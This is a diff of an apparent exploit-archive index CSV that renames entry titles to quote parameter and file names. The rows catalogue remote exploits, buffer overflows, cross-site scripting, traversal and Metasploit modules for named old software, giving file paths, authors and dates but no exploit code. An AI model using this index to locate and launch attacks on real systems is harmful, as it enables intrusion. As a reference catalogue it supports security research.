Database Banner Information Disclosure",2002-11-07,"Frank Perreault",multiple,remote,0 21997,platforms/windows/remote/21997.txt,"Perception LiteServe 2.0.1 - DNS Wildcard Cross-Site Scripting",2002-11-08,"Matthew Murphy",windows,remote,0 21998,platforms/linux/remote/21998.c,"CGIEmail 1.6 - Remote Buffer Overflow",2001-09-11,isox,linux,remote,0 @@ -13162,8 +13165,8 @@ id,file,description,date,author,platform,type,port 22827,platforms/windows/remote/22827.txt,"Compaq Web-Based Management Agent - Remote File Verification",2003-06-23,"Ian Vitek",windows,remote,0 22830,platforms/linux/remote/22830.c,"LBreakout2 2.x - Login Remote Format String",2003-06-24,V9,linux,remote,0 22832,platforms/freebsd/remote/22832.pl,"Gkrellmd 2.1 - Remote Buffer Overflow (2)",2003-06-24,dodo,freebsd,remote,0 -22833,platforms/windows/remote/22833.c,"Alt-N WebAdmin 2.0.x - USER Parameter Buffer Overflow (1)",2003-06-24,"Mark Litchfield",windows,remote,0 -22834,platforms/windows/remote/22834.c,"Alt-N WebAdmin 2.0.x - USER Parameter Buffer Overflow (2)",2003-06-24,"Mark Litchfield",windows,remote,0 +22833,platforms/windows/remote/22833.c,"Alt-N WebAdmin 2.0.x - 'USER' Buffer Overflow (1)",2003-06-24,"Mark Litchfield",windows,remote,0 +22834,platforms/windows/remote/22834.c,"Alt-N WebAdmin 2.0.x - 'USER' Buffer Overflow (2)",2003-06-24,"Mark Litchfield",windows,remote,0 22837,platforms/windows/remote/22837.c,"Microsoft Windows NT 4.0/2000 - Media Services 'nsiislog.dll' Remote Buffer Overflow",2003-06-25,firew0rker,windows,remote,0 22838,platforms/windows/remote/22838.txt,"BRS Webweaver 1.0 - Error Page Cross-Site Scripting",2003-06-26,"Carsten H. Eiram",windows,remote,0 22848,platforms/linux/remote/22848.c,"ezbounce 1.0/1.5 - Format String",2003-07-01,V9,linux,remote,0 @@ -13195,7 +13198,7 @@ id,file,description,date,author,platform,type,port 22968,platforms/linux/remote/22968.c,"Valve Software Half-Life Server 1.1.1.0/3.1.1.1c1/4.1.1.1a - Multiplayer Request Buffer Overflow",2003-07-29,hkvig,linux,remote,0 22917,platforms/windows/remote/22917.txt,"Microsoft Windows - DCOM RPC Interface Buffer Overrun",2003-08-11,aT4r@3wdesign.es,windows,remote,0 22919,platforms/windows/remote/22919.txt,"Microsoft ISA Server 2000 - Cross-Site Scripting",2003-07-16,"Brett Moore",windows,remote,0 -23006,platforms/php/remote/23006.rb,"Network Shutdown Module 3.21 - (sort_values) Remote PHP Code Injection (Metasploit)",2012-11-29,Metasploit,php,remote,0 +23006,platforms/php/remote/23006.rb,"Network Shutdown Module 3.21 - 'sort_values' Remote PHP Code Injection (Metasploit)",2012-11-29,Metasploit,php,remote,0 22969,platforms/linux/remote/22969.c,"Valve Software Half-Life Server 3.1.1.0 - Multiplayer Request Buffer Overflow",2003-07-29,KnbykL,linux,remote,0 22973,platforms/windows/remote/22973.rb,"Apple QuickTime 7.7.2 - MIME Type Buffer Overflow (Metasploit)",2012-11-28,Metasploit,windows,remote,0 22974,platforms/unix/remote/22974.c,"WU-FTPD 2.6.2 - 'realpath()' Off-by-One Buffer Overflow",2003-08-02,Xpl017Elz,unix,remote,0 @@ -13342,7 +13345,7 @@ id,file,description,date,author,platform,type,port 23437,platforms/windows/remote/23437.c,"DameWare Mini Remote Control Server 3.7x - Unauthenticated Buffer Overflow (3)",2003-12-16,kralor,windows,remote,0 23439,platforms/multiple/remote/23439.txt,"MVDSV 0.165 b/0.171 Quake Server - Download Buffer Overrun",2003-12-15,"Oscar Linderholm",multiple,remote,0 23441,platforms/linux/remote/23441.c,"Cyrus IMSP Daemon 1.x - Remote Buffer Overflow",2003-12-15,"Carlos Barros",linux,remote,0 -23446,platforms/windows/remote/23446.txt,"GoAhead Web Server 2.1.x - .ASP Script File Source Code Disclosure",2002-12-17,"Luigi Auriemma",windows,remote,0 +23446,platforms/windows/remote/23446.txt,"GoAhead Web Server 2.1.x - '.ASP' File Source Code Disclosure",2002-12-17,"Luigi Auriemma",windows,remote,0 23461,platforms/windows/remote/23461.txt,"dcam webcam server personal Web server 8.2.5 - Directory Traversal",2003-12-22,"Luigi Auriemma",windows,remote,0 23464,platforms/windows/remote/23464.pl,"Opera 7.x - Directory Traversal",2003-11-15,nesumin,windows,remote,0 23465,platforms/windows/remote/23465.txt,"Opera Browser 6.0 6 - URI Display Obfuscation",2003-12-23,nesumin,windows,remote,0 @@ -13399,7 +13402,7 @@ id,file,description,date,author,platform,type,port 23694,platforms/windows/remote/23694.rb,"RealPlayer - '.RealMedia' File Handling Buffer Overflow (Metasploit)",2012-12-27,Metasploit,windows,remote,0 23601,platforms/multiple/remote/23601.rb,"Netwin SurgeFTP - Remote Command Execution (Metasploit)",2012-12-23,Metasploit,multiple,remote,0 23603,platforms/windows/remote/23603.py,"herberlin bremsserver 1.2.4/3.0 - Directory Traversal",2004-01-26,"Donato Ferrante",windows,remote,0 -23604,platforms/linux/remote/23604.txt,"Antologic Antolinux 1.0 - Administrative Interface NDCR Parameter Remote Command Execution",2004-01-26,"Himeur Nourredine",linux,remote,0 +23604,platforms/linux/remote/23604.txt,"Antologic Antolinux 1.0 - Administrative Interface 'NDCR' Remote Command Execution",2004-01-26,"Himeur Nourredine",linux,remote,0 23605,platforms/solaris/remote/23605.txt,"Cherokee 0.1.x/0.2.x/0.4.x - Error Page Cross-Site Scripting",2004-01-26,"César Fernández",solaris,remote,0 23608,platforms/windows/remote/23608.pl,"InternetNow ProxyNow 2.6/2.75 - Multiple Stack / Heap Overflow Vulnerabilities",2004-01-26,"Peter Winter-Smith",windows,remote,0 23612,platforms/windows/remote/23612.txt,"BRS Webweaver 1.0.7 - 'ISAPISkeleton.dll' Cross-Site Scripting",2004-01-28,"Oliver Karow",windows,remote,0 @@ -13442,7 +13445,7 @@ id,file,description,date,author,platform,type,port 23785,platforms/windows/remote/23785.rb,"Microsoft Internet Explorer - CButton Object Use-After-Free (Metasploit)",2013-01-02,Metasploit,windows,remote,0 23790,platforms/windows/remote/23790.htm,"Microsoft Internet Explorer 5 - window.open Search Pane Cross-Zone Scripting",2003-09-10,"Liu Die Yu",windows,remote,0 23794,platforms/linux/remote/23794.txt,"PWebServer 0.3.x - Directory Traversal",2004-03-08,"Donato Ferrante",linux,remote,0 -23796,platforms/windows/remote/23796.html,"Microsoft Outlook 2002 - Mailto Parameter Quoting Zone Bypass",2004-03-09,shaun2k2,windows,remote,0 +23796,platforms/windows/remote/23796.html,"Microsoft Outlook 2002 - 'Mailto' Quoting Zone Bypass",2004-03-09,shaun2k2,windows,remote,0 23800,platforms/osx/remote/23800.txt,"Apple Safari 1.x - Cookie Directory Traversal",2004-03-10,"Corsaire Limited",osx,remote,0 23801,platforms/linux/remote/23801.txt,"GNU MyProxy 20030629 - Cross-Site Scripting",2004-03-11,"Donato Ferrante",linux,remote,0 23802,platforms/linux/remote/23802.txt,"Pegasi Web Server 0.2.2 - Arbitrary File Access",2004-03-11,"Donato Ferrante",linux,remote,0 @@ -13457,7 +13460,7 @@ id,file,description,date,author,platform,type,port 23855,platforms/hardware/remote/23855.txt,"Allied Telesis AT-MCF2000M 3.0.2 - Remote Command Execution",2013-01-03,dun,hardware,remote,0 23856,platforms/php/remote/23856.rb,"WordPress Plugin Advanced Custom Fields - Remote File Inclusion (Metasploit)",2013-01-03,Metasploit,php,remote,0 23864,platforms/linux/remote/23864.txt,"xweb 1.0 - Directory Traversal",2004-03-22,"Donato Ferrante",linux,remote,0 -23871,platforms/windows/remote/23871.txt,"Centrinity FirstClass HTTP Server 5/7 - TargetName Parameter Cross-Site Scripting",2004-03-22,"Richard Maudsley",windows,remote,0 +23871,platforms/windows/remote/23871.txt,"Centrinity FirstClass HTTP Server 5/7 - 'TargetName' Cross-Site Scripting",2004-03-22,"Richard Maudsley",windows,remote,0 23873,platforms/multiple/remote/23873.c,"Mythic Entertainment Dark Age of Camelot 1.6x - Encryption Key Signing",2004-03-23,"Todd Chapman",multiple,remote,0 23879,platforms/windows/remote/23879.txt,"HP Web Jetadmin 7.5.2456 - setinfo.hts Script Directory Traversal",2004-03-24,wirepair,windows,remote,0 23880,platforms/windows/remote/23880.txt,"HP Web Jetadmin 7.5.2456 - Arbitrary Command Execution",2004-03-24,wirepair,windows,remote,0 @@ -13551,7 +13554,7 @@ id,file,description,date,author,platform,type,port 24264,platforms/multiple/remote/24264.java,"Sun Java Virtual Machine 1.x - Font.createFont Method Insecure Temporary File Creation",2004-07-09,Jelmer,multiple,remote,0 24265,platforms/windows/remote/24265.html,"Microsoft Internet Explorer 5.0.1 - JavaScript Method Assignment Cross-Domain Scripting",2004-07-12,Paul,windows,remote,0 24266,platforms/windows/remote/24266.txt,"Microsoft Internet Explorer 5.0.1 - Popup.show Mouse Event Hijacking",2004-07-12,Paul,windows,remote,0 -24268,platforms/multiple/remote/24268.txt,"Code-Crafters Ability Mail Server 1.18 - errormsg Parameter Cross-Site Scripting",2004-07-12,dr_insane,multiple,remote,0 +24268,platforms/multiple/remote/24268.txt,"Code-Crafters Ability Mail Server 1.18 - 'errormsg' Cross-Site Scripting",2004-07-12,dr_insane,multiple,remote,0 24272,platforms/multiple/remote/24272.rb,"Jenkins - Script-Console Java Execution (Metasploit)",2013-01-21,Metasploit,multiple,remote,0 24273,platforms/php/remote/24273.rb,"PHP-Charts 1.0 - PHP Code Execution (Metasploit)",2013-01-21,Metasploit,php,remote,0 24276,platforms/windows/remote/24276.txt,"Mozilla Browser 0.9/1.x Cache File - Multiple Vulnerabilities",2004-07-13,"Mind Warper",windows,remote,0 @@ -13592,7 +13595,7 @@ id,file,description,date,author,platform,type,port 24419,platforms/windows/remote/24419.txt,"Xedus Web Server 1.0 - Traversal Arbitrary File Access",2004-09-30,"James Bercegay",windows,remote,0 24460,platforms/windows/remote/24460.rb,"VMware OVF Tools - Format String (Metasploit) (1)",2013-02-06,Metasploit,windows,remote,0 24434,platforms/multiple/remote/24434.rb,"Ruby on Rails - JSON Processor YAML Deserialization Code Execution (Metasploit)",2013-01-29,Metasploit,multiple,remote,0 -24444,platforms/php/remote/24444.rb,"DataLife Engine - preview.php PHP Code Injection (Metasploit)",2013-02-01,Metasploit,php,remote,0 +24444,platforms/php/remote/24444.rb,"DataLife Engine - 'preview.php' PHP Code Injection (Metasploit)",2013-02-01,Metasploit,php,remote,0 24455,platforms/unix/remote/24455.rb,"Portable UPnP SDK - 'unique_service_name()' Remote Code Execution (Metasploit)",2013-02-05,Metasploit,unix,remote,0 24461,platforms/windows/remote/24461.rb,"VMware OVF Tools - Format String (Metasploit) (2)",2013-02-12,Metasploit,windows,remote,0 24467,platforms/windows/remote/24467.rb,"ActFax 5.01 - RAW Server Exploit (Metasploit)",2013-02-07,"Craig Freyman",windows,remote,0 @@ -13667,7 +13670,7 @@ id,file,description,date,author,platform,type,port 24848,platforms/linux/remote/24848.txt,"ChBg 1.5 - Scenario File Overflow",2004-12-15,"Danny Lungstrom",linux,remote,0 24856,platforms/linux/remote/24856.c,"NapShare 1.2 - Remote Buffer Overflow (1)",2004-12-06,"Bartlomiej Sieka",linux,remote,0 24857,platforms/linux/remote/24857.c,"NapShare 1.2 - Remote Buffer Overflow (2)",2004-12-10,"Bartlomiej Sieka",linux,remote,0 -24874,platforms/multiple/remote/24874.rb,"Apache Struts - ParametersInterceptor Remote Code Execution (Metasploit)",2013-03-22,Metasploit,multiple,remote,0 +24874,platforms/multiple/remote/24874.rb,"Apache Struts - 'ParametersInterceptor' Remote Code Execution (Metasploit)",2013-03-22,Metasploit,multiple,remote,0 24875,platforms/windows/remote/24875.rb,"Sami FTP Server - LIST Command Buffer Overflow (Metasploit)",2013-03-22,Metasploit,windows,remote,0 24876,platforms/windows/remote/24876.rb,"Cool PDF Image Stream - Buffer Overflow (Metasploit)",2013-03-22,Metasploit,windows,remote,0 24886,platforms/windows/remote/24886.html,"Mitsubishi MX ActiveX Component 3 - 'ActUWzd.dll' (WzTitle) Remote Exploit",2013-03-25,Dr_IDE,windows,remote,0 @@ -13796,7 +13799,7 @@ id,file,description,date,author,platform,type,port 25384,platforms/windows/remote/25384.c,"Microsoft Windows XP/2000 - Internet Protocol Validation Remote Code Execution (2)",2005-04-16,"Yuri Gushin",windows,remote,0 25385,platforms/windows/remote/25385.cpp,"Microsoft Internet Explorer 5.0.1 - Content Advisor File Handling Buffer Overflow (MS05-020)",2005-04-12,"Miguel Tarasc",windows,remote,0 25386,platforms/windows/remote/25386.txt,"Microsoft Internet Explorer 5.0.1 - DHTML Object Race Condition Memory Corruption",2005-04-12,"Berend-Jan Wever",windows,remote,0 -25391,platforms/multiple/remote/25391.txt,"XAMPP - Phonebook.php Multiple Remote HTML Injection Vulnerabilities",2005-04-12,"Morning Wood",multiple,remote,0 +25391,platforms/multiple/remote/25391.txt,"XAMPP - 'Phonebook.php' Multiple Remote HTML Injection Vulnerabilities",2005-04-12,"Morning Wood",multiple,remote,0 25392,platforms/linux/remote/25392.c,"Salim Gasmi GLD (Greylisting Daemon) 1.x - Postfix Greylisting Daemon Buffer Overflow",2005-04-12,Xpl017Elz,linux,remote,0 25395,platforms/multiple/remote/25395.txt,"Sun JavaMail 1.3.2 - MimeBodyPart.getFileName Directory Traversal",2005-04-12,"Rafael San Miguel Carrasco",multiple,remote,0 25396,platforms/multiple/remote/25396.txt,"Oracle 8.x/9.x/10.x Database - Multiple SQL Injections",2005-04-13,"Esteban Martinez Fayo",multiple,remote,0 @@ -13872,7 +13875,7 @@ id,file,description,date,author,platform,type,port 25933,platforms/windows/remote/25933.txt,"WhitSoft SlimServe httpd 1.0/1.1 - Directory Traversal",2001-03-04,se00020,windows,remote,0 25944,platforms/multiple/remote/25944.txt,"IBM Lotus Domino Notes 6.0/6.5 - Mail Template Automatic Script Execution",2005-07-06,shalom@venera.com,multiple,remote,0 25966,platforms/hardware/remote/25966.txt,"Nokia Affix 2.0/2.1/3.x - BTSRV/BTOBEX Remote Command Execution",2005-07-12,"Kevin Finisterre",hardware,remote,0 -25970,platforms/linux/remote/25970.py,"Exim - sender_address Parameter Remote Code Execution",2013-06-05,eKKiM,linux,remote,0 +25970,platforms/linux/remote/25970.py,"Exim - 'sender_address' Remote Code Execution",2013-06-05,eKKiM,linux,remote,0 25975,platforms/linux/remote/25975.rb,"MiniUPnPd 1.0 - Stack Buffer Overflow Remote Code Execution (Metasploit)",2013-06-05,Metasploit,linux,remote,5555 25979,platforms/windows/remote/25979.rb,"Oracle WebCenter Content - 'CheckOutAndOpen.dll' ActiveX Remote Code Execution (Metasploit)",2013-06-05,Metasploit,windows,remote,0 25980,platforms/multiple/remote/25980.rb,"Apache Struts - includeParams Remote Code Execution (Metasploit)",2013-06-05,Metasploit,multiple,remote,8080 @@ -13943,8 +13946,8 @@ id,file,description,date,author,platform,type,port 26739,platforms/windows/remote/26739.py,"Ultra Mini HTTPD 1.21 - Stack Buffer Overflow",2013-07-11,superkojiman,windows,remote,80 26741,platforms/linux/remote/26741.pl,"Horde IMP 2.2.x/3.2.x/4.0.x - Email Attachments HTML Injection",2005-12-06,"SEC Consult",linux,remote,0 26768,platforms/cgi/remote/26768.txt,"ACME Perl-Cal 2.99 - Cal_make.pl Cross-Site Scripting",2005-12-08,$um$id,cgi,remote,0 -26773,platforms/windows/remote/26773.txt,"LogiSphere 0.9.9 j - viewsource.jsp source Parameter Traversal Arbitrary File Access",2005-12-12,dr_insane,windows,remote,0 -26774,platforms/windows/remote/26774.txt,"LogiSphere 0.9.9 j - Search URL NS-query-pat Parameter Traversal Arbitrary File Access",2005-12-12,dr_insane,windows,remote,0 +26773,platforms/windows/remote/26773.txt,"LogiSphere 0.9.9 j - 'viewsource.jsp?source' Traversal Arbitrary File Access",2005-12-12,dr_insane,windows,remote,0 +26774,platforms/windows/remote/26774.txt,"LogiSphere 0.9.9 j - 'Search?NS-query-pat' Traversal Arbitrary File Access",2005-12-12,dr_insane,windows,remote,0 26775,platforms/windows/remote/26775.txt,"LogiSphere 0.9.9 j - URI Multiple Method Traversal Arbitrary File Access",2005-12-12,dr_insane,windows,remote,0 26913,platforms/linux/remote/26913.c,"Info-ZIP UnZip 5.x - File Name Buffer Overflow",2005-12-19,DVDMAN,linux,remote,0 26966,platforms/multiple/remote/26966.txt,"httprint 202.0 - HTTP Response Server Field Arbitrary Script Injection",2005-12-22,"Mariano Nunez Di Croce",multiple,remote,0 @@ -13958,7 +13961,7 @@ id,file,description,date,author,platform,type,port 27046,platforms/windows/remote/27046.rb,"VMware vCenter - Chargeback Manager ImageUploadServlet Arbitrary File Upload (Metasploit)",2013-07-23,Metasploit,windows,remote,443 27072,platforms/windows/remote/27072.pl,"Microsoft Visual Studio - UserControl Remote Code Execution (1)",2006-01-12,anonymous,windows,remote,0 27073,platforms/windows/remote/27073.txt,"Microsoft Visual Studio - UserControl Remote Code Execution (2)",2006-01-12,priestmaster,windows,remote,0 -27095,platforms/multiple/remote/27095.txt,"Apache Tomcat / Geronimo 1.0 - Sample Script cal2.jsp time Parameter Cross-Site Scripting",2006-01-16,"Oliver Karow",multiple,remote,0 +27095,platforms/multiple/remote/27095.txt,"Apache Tomcat / Geronimo 1.0 - 'Sample Script cal2.jsp?time' Cross-Site Scripting",2006-01-16,"Oliver Karow",multiple,remote,0 27096,platforms/multiple/remote/27096.txt,"Apache Geronimo 1.0 - Error Page Cross-Site Scripting",2006-01-16,"Oliver Karow",multiple,remote,0 27133,platforms/linux_mips/remote/27133.py,"ASUS RT-AC66U - 'acsd' Remote Command Execution",2013-07-27,"Jacob Holcomb",linux_mips,remote,0 27135,platforms/multiple/remote/27135.rb,"Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution (Metasploit)",2013-07-27,Metasploit,multiple,remote,8080 @@ -13973,8 +13976,8 @@ id,file,description,date,author,platform,type,port 27271,platforms/windows/remote/27271.rb,"HP Data Protector - CMD Install Service (Metasploit)",2013-08-02,"Ben Turner",windows,remote,0 27277,platforms/windows/remote/27277.py,"PCMan FTP Server 2.07 - 'PASS' Command Buffer Overflow",2013-08-02,Ottomatik,windows,remote,0 27528,platforms/hardware/remote/27528.rb,"D-Link Devices - 'command.php' Unauthenticated Remote Command Execution (Metasploit)",2013-08-12,Metasploit,hardware,remote,0 -27293,platforms/php/remote/27293.rb,"PineApp Mail-SeCure - test_li_connection.php Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,php,remote,7443 -27294,platforms/php/remote/27294.rb,"PineApp Mail-SeCure - ldapsyncnow.php Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,php,remote,7443 +27293,platforms/php/remote/27293.rb,"PineApp Mail-SeCure - 'test_li_connection.php' Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,php,remote,7443 +27294,platforms/php/remote/27294.rb,"PineApp Mail-SeCure - 'ldapsyncnow.php' Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,php,remote,7443 27295,platforms/unix/remote/27295.rb,"PineApp Mail-SeCure - livelog.html Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,unix,remote,7443 27319,platforms/hardware/remote/27319.txt,"Thomson SpeedTouch 500 Series - NewUser Function 31 Variable Persistent User Creation",2006-02-25,"Preben Nylokken",hardware,remote,0 27325,platforms/windows/remote/27325.txt,"DirectContact 0.3.b - Directory Traversal",2006-02-27,"Donato Ferrante",windows,remote,0 @@ -14008,16 +14011,16 @@ id,file,description,date,author,platform,type,port 27608,platforms/windows/remote/27608.rb,"Ultra Mini HTTPD - Stack Buffer Overflow (Metasploit)",2013-08-15,Metasploit,windows,remote,80 27610,platforms/php/remote/27610.rb,"Joomla! Component Media Manager - Arbitrary File Upload (Metasploit)",2013-08-15,Metasploit,php,remote,80 27611,platforms/windows/remote/27611.txt,"Oracle Java - 'IntegerInterleavedRaster.verify()' Signed Integer Overflow",2013-08-15,"Packet Storm",windows,remote,0 -27627,platforms/windows/remote/27627.txt,"Saxopress - URL Parameter Directory Traversal",2006-04-11,SecuriTeam,windows,remote,0 +27627,platforms/windows/remote/27627.txt,"Saxopress - 'URL' Directory Traversal",2006-04-11,SecuriTeam,windows,remote,0 27630,platforms/linux/remote/27630.txt,"Plone 2.x - MembershipTool Access Control Bypass",2006-04-12,MJ0011,linux,remote,0 -27636,platforms/multiple/remote/27636.txt,"Adobe Document Server 6.0 Extensions - ads-readerext actionID Parameter Cross-Site Scripting",2006-04-13,"Tan Chew Keong",multiple,remote,0 -27637,platforms/multiple/remote/27637.txt,"Adobe Document Server 6.0 Extensions - AlterCast op Parameter Cross-Site Scripting",2006-04-13,"Tan Chew Keong",multiple,remote,0 +27636,platforms/multiple/remote/27636.txt,"Adobe Document Server 6.0 Extensions - 'ads-readerext?actionID' Cross-Site Scripting",2006-04-13,"Tan Chew Keong",multiple,remote,0 +27637,platforms/multiple/remote/27637.txt,"Adobe Document Server 6.0 Extensions - 'AlterCast?op' Cross-Site Scripting",2006-04-13,"Tan Chew Keong",multiple,remote,0 28056,platforms/hardware/remote/28056.txt,"Mikrotik RouterOS sshd (ROSSSH) - Remote Unauthenticated Heap Corruption",2013-09-03,kingcope,hardware,remote,0 27703,platforms/windows/remote/27703.py,"PCMan FTP Server 2.07 - 'STOR' Command Buffer Overflow",2013-08-19,Polunchis,windows,remote,0 27704,platforms/windows/remote/27704.rb,"Cogent DataHub - HTTP Server Buffer Overflow (Metasploit)",2013-08-19,Metasploit,windows,remote,0 27705,platforms/multiple/remote/27705.rb,"Java - 'storeImageArray()' Invalid Array Indexing (Metasploit)",2013-08-19,Metasploit,multiple,remote,0 27706,platforms/hardware/remote/27706.txt,"IBM 1754 GCM 1.18.0.22011 - Remote Command Execution",2013-08-19,"Alejandro Alvarez Bravo",hardware,remote,0 -27716,platforms/multiple/remote/27716.txt,"Asterisk Recording Interface 0.7.15 - Audio.php Information Disclosure",2006-04-21,"Francois Harvey",multiple,remote,0 +27716,platforms/multiple/remote/27716.txt,"Asterisk Recording Interface 0.7.15 - 'Audio.php' Information Disclosure",2006-04-21,"Francois Harvey",multiple,remote,0 27744,platforms/windows/remote/27744.html,"Microsoft Internet Explorer 5.0.1 - Modal Dialog Manipulation",2006-04-26,"Matthew Murphy",windows,remote,0 27746,platforms/windows/remote/27746.txt,"winiso 5.3 - Directory Traversal",2006-04-28,Sowhat,windows,remote,0 27747,platforms/windows/remote/27747.pl,"freeFTPd 1.0.10 - 'PASS' Buffer Overflow (SEH)",2013-08-21,Wireghoul,windows,remote,21 @@ -14041,15 +14044,15 @@ id,file,description,date,author,platform,type,port 27887,platforms/multiple/remote/27887.txt,"SAP Web Application Server 6.x/7.0 - Input Validation",2005-11-09,"Arnold Grossmann",multiple,remote,0 27891,platforms/hardware/remote/27891.txt,"Ipswitch WhatsUp Professional 2006 - Authentication Bypass",2006-05-17,"Kenneth F. Belva",hardware,remote,0 27892,platforms/hardware/remote/27892.txt,"obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - help Script Cross-Site Scripting",2006-05-17,"Jaime Blasco",hardware,remote,0 -27893,platforms/hardware/remote/27893.txt,"obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - events.tar source_ip Parameter Cross-Site Scripting",2006-05-17,"Jaime Blasco",hardware,remote,0 +27893,platforms/hardware/remote/27893.txt,"obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - 'events.tar?source_ip' Cross-Site Scripting",2006-05-17,"Jaime Blasco",hardware,remote,0 40382,platforms/multiple/remote/40382.txt,"Apache Mina 2.0.13 - Remote Command Execution",2016-09-14,"Gregory Draperi",multiple,remote,0 -27894,platforms/hardware/remote/27894.txt,"obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - eventplayer get_image_info_abspath Parameter Cross-Site Scripting",2006-05-17,"Jaime Blasco",hardware,remote,0 +27894,platforms/hardware/remote/27894.txt,"obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - 'eventplayer?get_image_info_abspath' Cross-Site Scripting",2006-05-17,"Jaime Blasco",hardware,remote,0 27902,platforms/linux/remote/27902.txt,"Prodder 0.4 - Arbitrary Shell Command Execution",2006-05-22,"RedTeam Pentesting",linux,remote,0 27923,platforms/hardware/remote/27923.txt,"D-Link Airspot DSA-3100 Gateway - 'Login_error.SHTML' Cross-Site Scripting",2006-05-30,"Jaime Blasco",hardware,remote,0 27931,platforms/multiple/remote/27931.txt,"Snort 2.4.x - URIContent Rules Detection Evasion",2006-05-31,"Blake Hartstein",multiple,remote,0 27939,platforms/windows/remote/27939.rb,"HP LoadRunner - lrFileIOService ActiveX Remote Code Execution (Metasploit)",2013-08-29,Metasploit,windows,remote,0 27940,platforms/windows/remote/27940.rb,"Mozilla Firefox - XMLSerializer Use-After-Free (Metasploit)",2013-08-29,Metasploit,windows,remote,0 -27941,platforms/php/remote/27941.rb,"SPIP - connect Parameter PHP Injection (Metasploit)",2013-08-29,Metasploit,php,remote,0 +27941,platforms/php/remote/27941.rb,"SPIP - 'connect' PHP Injection (Metasploit)",2013-08-29,Metasploit,php,remote,0 27943,platforms/windows/remote/27943.txt,"Oracle Java - ByteComponentRaster.verify() Memory Corruption",2013-08-29,"Packet Storm",windows,remote,0 27992,platforms/unix/remote/27992.txt,"FreeType - '.TTF' File Remote Buffer Overflow",2006-06-08,"Josh Bressers",unix,remote,0 27984,platforms/windows/remote/27984.txt,"Microsoft DXImageTransform.Microsoft.Light - ActiveX Control Remote Code Execution",2006-06-13,"Will Dormann",windows,remote,0 @@ -14093,7 +14096,7 @@ id,file,description,date,author,platform,type,port 28360,platforms/windows/remote/28360.c,"EasyCafe 2.1/2.2 - Security Restriction Bypass",2006-08-07,"Mobin Yazarlou",windows,remote,0 28365,platforms/multiple/remote/28365.txt,"Apache 2.2.2 - CGI Script Source Code Information Disclosure",2006-08-09,"Susam Pal",multiple,remote,0 28368,platforms/multiple/remote/28368.txt,"ArcSoft Mms Composer 1.5.5/2.0 - Multiple Vulnerabilities",2006-08-09,"Collin R. Mulliner",multiple,remote,0 -28373,platforms/windows/remote/28373.txt,"Panda ActiveScan 5.53 - Ascan_6.asp ActiveX Control Cross-Site Scripting",2006-08-10,Lostmon,windows,remote,0 +28373,platforms/windows/remote/28373.txt,"Panda ActiveScan 5.53 - 'Ascan_6.asp' ActiveX Control Cross-Site Scripting",2006-08-10,Lostmon,windows,remote,0 28374,platforms/windows/remote/28374.txt,"IPCheck Server Monitor 5.x - Directory Traversal",2006-08-10,"Tassi Raeburn",windows,remote,0 28376,platforms/windows/remote/28376.html,"McKesson - ActiveX File/Environmental Variable Enumeration",2013-09-18,blake,windows,remote,0 28397,platforms/linux/remote/28397.sh,"GNU BinUtils 2.1x - GAS Buffer Overflow",2006-08-17,"Tavis Ormandy",linux,remote,0 @@ -14106,7 +14109,7 @@ id,file,description,date,author,platform,type,port 28450,platforms/hardware/remote/28450.py,"FiberHome Modem Router HG-110 - Authentication Bypass To Remote Change DNS Servers",2013-09-22,"Javier Perez",hardware,remote,0 28481,platforms/windows/remote/28481.rb,"Microsoft Internet Explorer - CCaret Use-After-Free (MS13-069) (Metasploit)",2013-09-23,Metasploit,windows,remote,0 28482,platforms/windows/remote/28482.rb,"Microsoft Windows Theme File Handling - Arbitrary Code Execution (MS13-071) (Metasploit)",2013-09-23,Metasploit,windows,remote,0 -28483,platforms/php/remote/28483.rb,"GLPI - install.php Remote Command Execution (Metasploit)",2013-09-23,Metasploit,php,remote,80 +28483,platforms/php/remote/28483.rb,"GLPI - 'install.php' Remote Command Execution (Metasploit)",2013-09-23,Metasploit,php,remote,80 28484,platforms/hardware/remote/28484.rb,"Linksys WRT110 - Remote Command Execution (Metasploit)",2013-09-23,Metasploit,hardware,remote,0 28489,platforms/windows/remote/28489.txt,"Easy Address Book Web Server 1.2 - Remote Format String",2006-09-04,"Revnic Vasile",windows,remote,0 28500,platforms/windows/remote/28500.txt,"Microsoft Indexing Service - Query Validation Cross-Site Scripting",2006-09-12,"Eiji James Yoshida",windows,remote,0 @@ -14179,10 +14182,10 @@ id,file,description,date,author,platform,type,port 29324,platforms/linux/remote/29324.rb,"Moodle - Remote Command Execution (Metasploit)",2013-10-31,Metasploit,linux,remote,80 29325,platforms/php/remote/29325.rb,"ProcessMaker Open Source - Authenticated PHP Code Execution (Metasploit)",2013-10-31,Metasploit,php,remote,80 30186,platforms/linux/remote/30186.txt,"Firebird SQL Fbserver 2.0 - Remote Buffer Overflow",2007-06-12,"Cody Pierce",linux,remote,0 -29371,platforms/multiple/remote/29371.txt,"Oracle 10g - Portal Key Parameter Cross-Site Scripting",2006-12-29,"Pham Duc Hai",multiple,remote,0 -29383,platforms/linux/remote/29383.txt,"Adobe Reader 9.1.3 Plugin - Open Parameters Cross-Site Scripting",2007-01-03,"Stefano Di Paola",linux,remote,0 +29371,platforms/multiple/remote/29371.txt,"Oracle 10g Portal - 'Key' Cross-Site Scripting",2006-12-29,"Pham Duc Hai",multiple,remote,0 +29383,platforms/linux/remote/29383.txt,"Adobe Reader 9.1.3 Plugin - Cross-Site Scripting",2007-01-03,"Stefano Di Paola",linux,remote,0 29475,platforms/multiple/remote/29475.txt,"Oracle January 2007 Security Update - Multiple Vulnerabilities",2007-01-16,"Esteban Martinez Fayo",multiple,remote,0 -29400,platforms/novell/remote/29400.txt,"Novell Access Manager 3 - Identity Server IssueInstant Parameter Cross-Site Scripting",2007-01-08,anonymous,novell,remote,0 +29400,platforms/novell/remote/29400.txt,"Novell Access Manager 3 Identity Server - 'IssueInstant' Cross-Site Scripting",2007-01-08,anonymous,novell,remote,0 29439,platforms/multiple/remote/29439.txt,"iPlanet Web Server 4.1 - Search Module Cross-Site Scripting",2007-01-09,Khalsa,multiple,remote,0 29448,platforms/osx/remote/29448.txt,"Apple 